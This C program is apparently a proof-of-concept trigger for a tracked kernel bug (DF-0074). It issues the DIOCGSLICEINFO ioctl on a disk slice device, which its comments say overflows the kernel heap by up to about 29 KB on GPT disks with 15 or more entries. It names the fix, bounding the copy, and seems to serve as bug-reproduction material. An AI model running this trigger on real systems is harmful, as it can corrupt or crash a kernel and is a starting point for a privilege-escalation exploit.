/*
 * DF-0074 trigger - issue DIOCGSLICEINFO on a slice device whose backing
 * disk has a GPT with >= 15 entries, which causes the kernel heap overflow
 * at subr_diskslice.c:557.  The program only opens the device read-only
 * and issues that single ioctl.
 *
 * Build:  cc -o trigger trigger.c
 * Usage:  ./trigger [device]      (default device: /dev/vnd0s1)
 */
#include <sys/ioctl.h>
#include <sys/diskslice.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

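/*
 * Open the slice device named by argv[1] (default "/dev/vnd0s1") read-only,
 * issue a single DIOCGSLICEINFO ioctl on it and report the slice count the
 * kernel handed back.
 *
 * Returns 0 when the ioctl succeeds, 1 when open() or ioctl() fails.
 */
int
main(int argc, char **argv)
{
    const char *dev = (argc > 1) ? argv[1] : "/dev/vnd0s1";
    /* Zero-filled so the fields read below have a defined value even if the
     * kernel leaves part of the structure untouched. */
    struct diskslices ds = {0};
    /* Number of struct diskslice slots the ioctl argument has room for. */
    const size_t capacity = sizeof ds.dss_slices / sizeof ds.dss_slices[0];
    int fd;

    fd = open(dev, O_RDONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    /* DIOCGSLICEINFO bcopy()s dss_nslices-worth of struct diskslice into
     * a sizeof(struct diskslices) (16-slice) buffer.  For a GPT disk with
     * >= 15 entries this overflows the kernel heap by up to ~29 KB.
     * The write happens inside the kernel handler, so nothing done in this
     * process after the call can undo it; the remedy is for the handler to
     * bound the copy by the size of the destination buffer. */
    if (ioctl(fd, DIOCGSLICEINFO, &ds) < 0) {
        perror("ioctl DIOCGSLICEINFO");
        close(fd);
        return 1;
    }

    fprintf(stderr, "DIOCGSLICEINFO returned nslices=%u\n", ds.dss_nslices);

    /* A count above the structure's own capacity means the kernel's slice
     * table is larger than the fixed-size ioctl buffer described above,
     * which is the condition DF-0074 depends on.  Reporting it makes the
     * result readable without knowing the array size by heart. */
    if (ds.dss_nslices > capacity) {
        fprintf(stderr,
            "nslices exceeds the %zu slots in struct diskslices: "
            "kernel slice table is larger than the ioctl buffer\n",
            capacity);
    }

    close(fd);
    return 0;
}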
